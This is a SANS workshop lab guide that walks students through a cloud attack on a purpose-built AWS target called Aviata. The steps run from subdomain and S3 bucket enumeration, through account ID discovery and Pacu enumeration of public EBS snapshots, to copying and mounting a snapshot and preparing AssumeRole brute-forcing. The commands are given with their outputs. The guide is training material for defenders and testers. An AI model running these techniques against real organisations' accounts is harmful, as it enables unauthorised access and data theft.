SANS Cloud Curriculum - 2024 Workshop Series
Aviata Solo Flight Challenge - Chapter 1
Systems Requirements
This workshop will require the following packages of software to operate:
- An x86-based system that is capable of running docker or Docker Desktop.
- Terraform version 1.6 or higher
- A web browser
- You will need to bring your own AWS Account that we will reference as the attacker account.
- You have created an IAM access key that is used to build IAM policies and other resources in that attacker account. If you used Named Profiles, please make note of them.
- You will need to git pull the repository for our system https://github.com/sans-sec588/sec588-workshop-containers-ace135.
Setup
To begin this workshop you are going to need to be running terraform in your OWN account in AWS. You would recognize this as your AWS Account. The structure of this repository is as follows:
- By running
start.sh
you have now built the container for this workshop. Congratulations! - The
terraform
directory is for your attacker account. What does it do? It creates an IAM role called s3-searcher will all of the various requirements needed to attack the individual target accounts. - Finally, there is the
tools
directory. This is another docker-compose directory that will be used to create your attacker tools.
Bonus Content
Bonus: You will also find a directory called build-directory
. The README.md
in that directory will allow you to build the target environment in your own AWS account. The only thing you must be aware of is the fact that the target and attacker accounts must be DIFFERENT or the labs will not work. Use the build-directory terraform in your target account. This will NOT be used for this workshop.
Running the Terraform script
-
For those that need to build their roles out you will need to run the terraform application in the
terraform
directory and you can do so by running the following commands. First, we will need to move into the directory and create theterraform.tfvars
file. For reference, there is an exampleterraform.tfvars.example
file that is provided.Danger
Please note that these steps will be shown from the point of view of a Unix workstation and will use self-referencing paths. Your paths will be different on the local system. It is important to note that in the portion where we create a terraform.tfvars file you must change your profile and region settings to be reflective of your environment.
Command lines
cd terraform
Command lines
cat << EOF > terraform.tfvars profile = "default" region = "us-east-2" EOF
-
Once this is complete you can then run the
terraform init
andapply
commands.Command lines
terraform init
Command lines
terraform apply
Example Results
data.aws_caller_identity.current: Reading... data.aws_caller_identity.current: Read complete after 0s [id=3[REDACTED]8] Terraform used the selected providers to generate the following execution plan. Resource actions are indicated with the following symbols: + create Terraform will perform the following actions: # aws_iam_policy.s3_searcher_policy will be created + resource "aws_iam_policy" "s3_searcher_policy" { + arn = (known after apply) + description = "SEC588 Container Lab Searcher Policy" + id = (known after apply) + name = "s3-searcher" + name_prefix = (known after apply) + path = "/" + policy = jsonencode( { + Statement = [ + { + Action = "s3:GetObject" + Effect = "Allow" + Resource = "arn:aws:s3:::*/*" + Sid = "VisualEditor0" }, + { + Action = "s3:ListBucket" + Effect = "Allow" + Resource = "arn:aws:s3:::*" + Sid = "VisualEditor1" }, ] + Version = "2012-10-17" } ) + policy_id = (known after apply) + tags_all = (known after apply) } # aws_iam_role.s3_searcher will be created + resource "aws_iam_role" "s3_searcher" { + arn = (known after apply) + assume_role_policy = jsonencode( { + Statement = [ + { + Action = "sts:AssumeRole" + Condition = {} + Effect = "Allow" + Principal = { + AWS = "3[REDACTED]8" } }, ] + Version = "2012-10-17" } ) + create_date = (known after apply) + force_detach_policies = false + id = (known after apply) + managed_policy_arns = (known after apply) + max_session_duration = 3600 + name = "s3-searcher" + name_prefix = (known after apply) + path = "/" + tags_all = (known after apply) + unique_id = (known after apply) } # aws_iam_role_policy_attachment.s3_searcher will be created + resource "aws_iam_role_policy_attachment" "s3_searcher" { + id = (known after apply) + policy_arn = (known after apply) + role = "s3-searcher" } Plan: 3 to add, 0 to change, 0 to destroy. Changes to Outputs: + final_text = (known after apply) Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. Enter a value: yes aws_iam_role.s3_searcher: Creating... aws_iam_policy.s3_searcher_policy: Creating... aws_iam_policy.s3_searcher_policy: Creation complete after 1s [id=arn:aws:iam::3[REDACTED]8:policy/s3-searcher] aws_iam_role.s3_searcher: Creation complete after 1s [id=s3-searcher] aws_iam_role_policy_attachment.s3_searcher: Creating... aws_iam_role_policy_attachment.s3_searcher: Creation complete after 0s [id=s3-searcher-20240403171759720000000001] Apply complete! Resources: 3 added, 0 changed, 0 destroyed. Outputs: final_text = <<EOT ------------------------------------------------------------------------------- Role ARN for the first portion of the lab: arn:aws:iam::3[REDACTED]8:role/s3-searcher Command to run for the first portion of the lab: s3-account-search arn:aws:iam::3[REDACTED]8:role/s3-searcher dev.aviata.cloud ------------------------------------------------------------------------------- EOT
Please Read
You may have noticed this line during the run of terraform:
Command to run for the first portion of the lab: s3-account-search arn:aws:iam::3[REDACTED]8:role/s3-searcher bucket-name-here
Please make note of this line because we will be using it during our beginning lab.
-
With this done we can move on to the attacker portion of the lab.
Setting up our Docker container
-
We have a docker container ready for students to run. Go into the tools directory to build the container:
Command lines
cd tools
Command lines
docker build -t sec588-workshop-container-tools .
Example Results
docker build -t sec588-workshop-container-tools . [+] Building 0.4s (13/13) FINISHED docker:desktop-linux => [internal] load build definition from Dockerfile 0.0s => => transferring dockerfile: 924B 0.0s => [internal] load metadata for docker.io/library/debian:bookworm 0.3s => [internal] load .dockerignore 0.0s => => transferring context: 2B 0.0s => [1/8] FROM docker.io/library/debian:bookworm@sha256:e97ee92bf1e11a2de654e9f3da827d8dce32b54e0490ac83bfc65c8706568116 0.0s => [internal] load build context 0.0s [REDACTED DUE TO SPACE] => => writing image sha256:216d53c4397cfa2df2389ff8634d7f0298cc94fce705a106e07bc1c2cd08a01a 0.0s => => naming to docker.io/sec588-workshop-container-tools 0.0s
-
OPTIONAL We now have built our container, however, if you would like a prebuilt container you can also use our pre-built on below:
Command lines
docker pull mosesrenegade/sec588-workshop-container-tools docker tag mosesrenegade/sec588-workshop-container-tools:latest sec588-workshop-container-tools:latest
-
Within the
tools
directory ensure you have a.aws
directory with a correspondingcredentials
file. In this file, you will have the profile that you will use to login to YOUR AWS Account.Command lines
cd <git-checkout-dir> mkdir ./tools/.aws
Command Lines
cat << EOF > ./tools/.aws/credentials [default] aws_access_key_id = AKIA[REDACTED] aws_secret_access_key = VM[REDACTED] EOF
Instructions
Please follow these instructions to run through the actual workshop portion of the labs.
How to get an account from a bucket.
-
As a mercenary, you have been tasked with gathering as many internal trade secrets from Aviata as possible. How are they able to get around the world twice with their aircraft? As such you need to start by performing careful reconnaissance. You can start by performing a DNS Reconnaissance scan of their infrastructure by looking at their websites.
Danger
Please note that these steps will be shown from the point of view of a Unix workstation and will use self-referencing paths. Your paths will be different on the local system. When we cd into the tools directory, this is the directory that is called tools within the
git
directory you pulled.Command lines
cd tools
Command lines
docker run --rm -v ${PWD}/.aws:/root/.aws -v ${PWD}/workdir:/root/workdir -it sec588-workshop-container-tools /bin/bash
Command lines
subfinder -d aviata.cloud -o /root/workdir/subfinder.txt
Example Results
sec588-workshop-containers-ace135 $ cd tools sec588-workshop-containers-ace135/tools $ docker run -v ${PWD}/.aws:/root/.aws -v ${PWD}/workdir:/root/workdir -it sec588-workshop-container-tools /bin/bash root@588ace135fab:~# subfinder -d aviata.cloud -o /root/workdir/subfinder.txt __ _____ __ _______ __/ /_ / __(_)___ ____/ /__ _____ / ___/ / / / __ \/ /_/ / __ \/ __ / _ \/ ___/ (__ ) /_/ / /_/ / __/ / / / / /_/ / __/ / /____/\__,_/_.___/_/ /_/_/ /_/\__,_/\___/_/ projectdiscovery.io [INF] Current subfinder version v2.6.6 (latest) [INF] Loading provider config from /root/.config/subfinder/provider-config.yaml [INF] Enumerating subdomains for aviata.cloud dev.aviata.cloud aviata.cloud [INF] Found 2 subdomains for aviata.cloud in 28 seconds 449 milliseconds root@588ace135fab:~#
-
We now have a list of sites that we can feed into a tool such as s3scanner which could let us know which one of these sites are s3 buckets or could match an s3 bucket location. The s3scanner tool works across clouds so it's not limited to AWS S3.
Command lines
s3scanner -bucket-file /root/workdir/subfinder.txt
Example Results
root@588ace135fab:~/bin# s3scanner -bucket-file /root/workdir/subfinder.txt (venv) root@588ace135fab:~/workdir# s3scanner -bucket-file /root/workdir/subfinder.txt INFO not_exist | aviata.cloud INFO exists | dev.aviata.cloud | us-east-2 | AuthUsers: [] | AllUsers: [READ]
-
Do you notice that there is a bucket that has
READ
and houses our website? One of the things we can do, and this research is thanks to many individuals that are credited below, is we can figure out what exactly our target account number is. The AWS account numbers should be secret, however many times they are not kept secret. The account numbers instead are provided very freely to individuals which can lead to issues as we will see. Do you recall from a previous lab that we now have a command string like so:s3-account-search arn:aws:iam::3[REDACTED]8:role/s3-searcher dev.aviata.cloud
please note that we will need ot insert it here, and use the name of the bucket we found above.Command lines
s3-account-search --profile default arn:aws:iam::17[EXAMPLE]3:role/s3-searcher dev.aviata.cloud
Example Results
root@588ace135fab:~# s3-account-search --profile default arn:aws:iam::17[EXAMPLE]3:role/s3-searcher dev.aviata.cloud Starting search (this can take a while) found: 3 found: 31 found: 97[ found: 97[E found: 97[EX found: 97[EXA found: 97[EXAM found: 97[EXAMP found: 97[EXAMPL found: 97[EXAMPLE found: 97[EXAMPLE] found: 97[EXAMPLE]8
Snapshots in Accounts
-
We now have our target's information, but what attacks can we effectively launch with this? That becomes a more serious question as the attacks will not be done via brute force. Looking for misconfigurations that may or may not exist. List out the attack vectors possible:
- Cross Account flaws and misconfigurations
- Publicly accessible items that should be private.
But what items are publicly accessible? Well EBS Snapshots can be made public, AMIs can be made public. ECR containers can be made public. Let's use tools to figure this out.
-
From within the container, we can run
pacu
to list out EBS Snapshots. We need to supply Pacu with our AWS Keys, but this however is not all that difficult.Command lines
cd /root/pacu
Command lines
source venv/bin/activate
Command lines
python3 cli.py
Note
You will be asked to create a "session for pacu", this can be anything you like, we will use the name aviata.
Command lines
What would you like to name this new session? aviata
Example Results
(venv) root@588ace135fab:~/pacu# python3 cli.py No database found at /root/.local/share/pacu/sqlite.db Database created at /root/.local/share/pacu/sqlite.db ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣿⣿⣿⣿⣿⣿⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⡿⠛⠉⠁⠀⠀⠈⠙⠻⣿⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠛⠛⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣷⣀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣤⣤⣤⣤⣤⣤⣤⣤⣀⣀⠀⠀⠀⠀⠀⠀⢻⣿⣿⣿⡿⣿⣿⣷⣦⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣈⣉⣙⣛⣿⣿⣿⣿⣿⣿⣿⣿⡟⠛⠿⢿⣿⣷⣦⣄⠀⠀⠈⠛⠋⠀⠀⠀⠈⠻⣿⣷⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣈⣉⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣀⣀⣀⣤⣿⣿⣿⣷⣦⡀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣆⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣬⣭⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⢛⣉⣉⣡⣄⠀⠀⠀⠀⠀⠀⠀⠀⠻⢿⣿⣿⣶⣄⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣁⣤⣶⡿⣿⣿⠉⠻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢻⣿⣧⡀ ⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣠⣶⣿⡟⠻⣿⠃⠈⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⣧ ⢀⣀⣤⣴⣶⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠁⢠⣾⣿⠉⠻⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿ ⠉⠛⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⡟ ⠀⠀⠀⠀⠉⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⡟⠁ ⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣄⡀⠀⠀⠀⠀⠀⣴⣆⢀⣴⣆⠀⣼⣆⠀⠀⣶⣶⣶⣶⣶⣶⣶⣶⣾⣿⣿⠿⠋⠀⠀ ⠀⠀⠀⣼⣿⣿⣿⠿⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠓⠒⠒⠚⠛⠛⠛⠛⠛⠛⠛⠛⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠀⠀⠀⠀⠀ ⠀⠀⠀⣿⣿⠟⠁⠀⢸⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣷⡄⠀⢀⣾⣿⣿⣿⣿⣿⣿⣷⣆⠀⢰⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠘⠁⠀⠀⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢿⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⣿⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠸⠿⠿⠟⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⡿⠃⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢀⣀⣀⣀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡏⠉⠉⠉⠉⠀⠀⠀⢸⣿⣿⡏⠉⠉⢹⣿⣿⡇⠀⢸⣿⣿⣇⣀⣀⣸⣿⣿⣿⠀⢸⣿⣿⣿⣀⣀⣀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⠸⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⡟ ⠀⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠘⠛⠛⠃⠀⠀⠉⠛⠛⠛⠛⠛⠛⠋⠀⠀⠀⠀⠙⠛⠛⠛⠛⠛⠉⠀ Version: 1.5.3 What would you like to name this new session? aviata
-
Now that we have pacu running, let's move on to importing our Keys, we will use these AWS keys to perform reconnaissance on that account.
Command lines
import_keys --all
Example Results
Pacu (aviata:No Keys Set) > import_keys --all Imported keys as "imported-default" Pacu (aviata:imported-default) >
-
The next step will be for us to run the
ebs__eum_snapshots_unauth
module which will use our keys to search for EBS snapshots that are located within the target organization's account. If the command above gives no output, the machine is not ready; wait about 30 seconds and try again.Command lines
run ebs__enum_snapshots_unauth --account-id 97[EXAMPLE]8
Example Results
Pacu (workshop:from_default) > run ebs__enum_snapshots_unauth --account-id 97[EXAMPLE]8 Running module ebs__enum_snapshots_unauth... [ebs__enum_snapshots_unauth] Starting region ap-northeast-1... [ebs__enum_snapshots_unauth] Starting region ap-northeast-3... [ebs__enum_snapshots_unauth] Starting region ap-south-1... [ebs__enum_snapshots_unauth] Starting region ap-southeast-2... [ebs__enum_snapshots_unauth] Starting region eu-north-1... [ebs__enum_snapshots_unauth] Starting region eu-west-2... [ebs__enum_snapshots_unauth] Starting region eu-west-3... [ebs__enum_snapshots_unauth] Starting region me-central-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region sa-east-1... [ebs__enum_snapshots_unauth] Starting region us-gov-west-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region af-south-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region ap-northeast-2... [ebs__enum_snapshots_unauth] Starting region ap-south-2... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region ap-southeast-4... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region eu-south-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region il-central-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region us-east-1... [ebs__enum_snapshots_unauth] Starting region us-east-2... [ebs__enum_snapshots_unauth] [+] Snapshot found: snap-0a[EXAMPLE]2 [ebs__enum_snapshots_unauth] Starting region us-gov-east-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region us-west-2... [ebs__enum_snapshots_unauth] Starting region ap-east-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region ap-southeast-1... [ebs__enum_snapshots_unauth] Starting region ap-southeast-3... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region ca-central-1... [ebs__enum_snapshots_unauth] Starting region ca-west-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region cn-north-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region eu-central-2... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region eu-south-2... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region eu-west-1... [ebs__enum_snapshots_unauth] Starting region me-south-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region cn-northwest-1... FAILURE: AuthFailure [ebs__enum_snapshots_unauth] Starting region eu-central-1... [ebs__enum_snapshots_unauth] Starting region us-west-1... [ebs__enum_snapshots_unauth] ebs__enum_snapshots_unauth completed. [ebs__enum_snapshots_unauth] MODULE SUMMARY: 1 EBS Snapshots found Keyword/AccountId: 97[EXAMPLE]8, SnapshotId: snap-0a[EXAMPLE]2, Region: us-east-2, Description: , OwnerId: 97[EXAMPLE]8, Encrypted: False
-
We have now located a snapshot that has appeared to be made public. Given that this is a public Snapshot we would want to make sure that we can pull it to our attacker account, and we can then mount it as a secondary disk to be able to look within it. Please note that the string:
Keyword/AccountId: 97[EXAMPLE]8, SnapshotId: snap-0a[EXAMPLE]2, Region: us-east-2, Description: , OwnerId: 97[EXAMPLE]8, Encrypted: False
Will contain the snapshot identifier which is in our example:
snap-0a[EXAMPLE]2
. Make a note of this and use it in the command below:Please take note
The following commands will be run in one terminal. Please make sure that you do not close this window. In addition, please make sure that the snapshot id you copy is NOT THE ONE listed in this guide, YOURS will be UNIQUE.
Command lines
exit
Command lines
aws ec2 copy-snapshot --region us-east-2 --source-region us-east-2 --description "Taken Snapshot" --query 'SnapshotId' --output text --source-snapshot-id snap-0a[EXAMPLE]2
Example Results
Pacu (aviata:imported-default) > exit (venv) root@588ace135fab:~/pacu# aws ec2 copy-snapshot --region us-east-2 --source-region us-east-2 --description "Taken Snapshot" --query 'SnapshotId' --output text --source-snapshot-id snap-0a[EXAMPLE]2 snap-0e3c953b5afc8746f
Let's now save the Snapshot id as a variable that we will be using in the next step.
Command lines
SnapshotId="snap-0e3c953b5afc8746f"
-
Now that we have copied the snapshot let's mount it into a machine so we can inspect it. First, we will need the AMI that we can use to boot a system with, let's use Ubuntu 22.04.
Command lines
AMI=$(aws ec2 describe-images --filters 'Name=name,Values=ubuntu/images/hvm-ssd/ubuntu-jammy-22.04-amd64-server-*' --owners 099720109477 --query 'Images[*].[ImageId,CreationDate]' --region us-east-2 --output text | sort -k2 -r | head -n1 | awk '{ print $1 }')
Next, let's go ahead and create an SSH key-pair for us to use.
Danger
Please only run this once, if you run the command below twice you will need a different key name or you will need to delete your key as you have lost your private key on disk.
Command lines
aws ec2 create-key-pair --region us-east-2 --key-name attacker-key --query 'KeyMaterial' --output text > /root/workdir/attacker-key.pem
Command lines
chmod 600 /root/workdir/attacker-key.pem
Finally, with all of this, we can build a file that is called a mappings.json file that will allow us to mount the snapshot as a volume.
Command lines
cat << EOF > /root/workdir/mappings.json [ { "DeviceName": "/dev/sdh", "Ebs": { "SnapshotId": "$SnapshotId" } } ] EOF
Lastly, let's boot the machine, please make sure that you retain the Instance ID in the JSON output, please note this command is shown to you in the terraform output in the setup. The command below is only for reference.
Command lines
aws ec2 run-instances --image-id $AMI \ --region us-east-2 \ --count 1 \ --instance-type t2.micro \ --key-name attacker-key \ --security-group-ids sg-07[EXAMPLE]e \ --subnet-id subnet-07[EXAMPLE]1 \ --block-device-mappings file:///root/workdir/mappings.json
Example Results
(venv) root@588ace135fab:~/pacu# AMI=$(aws ec2 describe-images --filters 'Name=name,Values=ubuntu/images/hvm-ssd/ubuntu-jammy-22.04-amd64-server-*' --owners 099720109477 --query 'Images[*].[ImageId,CreationDate]' --region us-east-2 --output text | sort -k2 -r | head -n1 | awk '{ print $1 }') (venv) root@588ace135fab:~/pacu# aws ec2 create-key-pair --region us-east-2 --key-name attacker-key --query 'KeyMaterial' --output text > /root/workdir/attacker-key.pem (venv) root@588ace135fab:~/pacu# cat << EOF > /root/workdir/mappings.json cat << EOF > /root/workdir/mappings.json [ { "DeviceName": "/dev/sdh", "Ebs": { "SnapshotId": "$SnapshotId" } } ] EOF (venv) root@588ace135fab:~/pacu# aws ec2 run-instances --image-id $AMI \ --region us-east-2 \ --count 1 \ --instance-type t2.micro \ --key-name attacker-key \ --security-group-ids sg-07[EXAMPLE]e \ --subnet-id subnet-07[EXAMPLE]1 \ --block-device-mappings file:///root/workdir/mappings.json
-
We will now be getting the EC2 Public IP address to connect to in order to view the contents of the snapshot.
Command lines
export EC2IP=$(aws ec2 describe-instances --query 'Reservations[].Instances[]' --region us-east-2 | jq -r '.[] | select(.State.Name=="running") | select(.KeyName=="attacker-key") | .PublicIpAddress') echo $EC2IP
The next step will be to log into our EC2 instance in order to look within the disk, remember the machine may take a minute or two to start. If the command above gave no output, the machine is not ready; wait about 30 seconds and try again.
Command Lines
ssh -i /root/workdir/attacker-key.pem ubuntu@$EC2IP
Example Results
(venv) root@588ace135fab:~/pacu# ssh -i /root/workdir/attacker-key.pem ubuntu@$EC2IP The authenticity of host '18.226.88.65 (18.226.88.65)' can't be established. ED25519 key fingerprint is SHA256:QkbePxcv5PsCdkL52yCAUb1MATMV/ivu5VwWilHl7s4. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '18.226.88.65' (ED25519) to the list of known hosts. Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 6.5.0-1017-aws x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro System information as of Sat Apr 13 08:57:11 UTC 2024 System load: 0.40087890625 Processes: 102 Usage of /: 20.8% of 7.57GB Users logged in: 0 Memory usage: 21% IPv4 address for eth0: 10.1.0.13 Swap usage: 0% Expanded Security Maintenance for Applications is not enabled. 0 updates can be applied immediately. Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. ubuntu@ip-10-1-0-224:~$
-
Notice the prompt changes from your container prompt to the (venv) prompt as we are now in our Attacker VM in the cloud. The next part will be to mount the disk and look for any sources of information we can find.
Command Lines
sudo mount /dev/xvdh /mnt
Command Lines
cd /mnt
Example Results
ubuntu@ip-10-1-0-224:~$ sudo mount /dev/xvdh /mnt ubuntu@ip-10-1-0-224:~$ cd /mnt
-
Now let's explore the system. There are many ways to do this including:
- Using
grep
- Using
find
Looking in well-known locations such as/etc
,/home
,/root
,/opt
and others
Let's look for some of those well-known locations inside the
/mnt
directory.Command Lines
ls /mnt/
Example Results
ubuntu@ip-10-1-0-224:/mnt$ ls /mnt/ bin boot dev etc home lib lost+found media mnt opt proc root run sbin srv sys tmp usr var ubuntu@ip-10-1-0-224:/mnt$
Did you notice a directory called 'opt', maybe there could be valuable information in files in there.
Command Lines
find /mnt/opt -type f
Command Lines
cat /mnt/opt/aviata/data/plans
Example Results
ubuntu@ip-10-1-0-224:/mnt$ find /mnt/opt -type f /mnt/opt/aviata/data/plans ubuntu@ip-10-1-0-224:/mnt$ cat /mnt/opt/aviata/data/plans You think you found the plans to Aviata? Maybe you should stay tuned to sans.org/ace135 and find out whats next...
You can use cat, grep, or other tools to explore the snapshot more if you wish.
- Using
-
Let's now leave our Virtual Machine and return to our container.
Command Lines
exit
AssumeRole attacks
-
From within our container, we are going to run one more command set, this time we are going to show you the dangers of AssumeRole in AWS. We can create a word list of potential names that
Aviata
could use for roles in their environment. This is just guesswork but there could be several ways to obtain role names in the most naive way.- Documented Vendor Role names
- AWS Documented Role names
Any one of these sources may be able to provide us with what we need for this attack.
Command Lines
cat << EOF > /root/workdir/wordlist.txt aviata aviata-cloud EOF
Example Output
(venv) root@588ace135fab:~/pacu# cat << EOF > /root/workdir/wordlist.txt aviata aviata-cloud EOF
-
With this wordlist what could we do? We could us
pacu
to brute force and enumerate roles. Let's move back intopacu
.First go into the
pacu
directory.Command Lines
cd /root/pacu
Danger
If you do not see (venv) in your prompt, run the following command:
source venv/bin/activate
.Next, type the command to get
pacu
working.Command Lines
python3 cli.py
Since you already have an existing
pacu
session, go in and make sure you can use it again by typing1
.Command Lines
1
Example Output
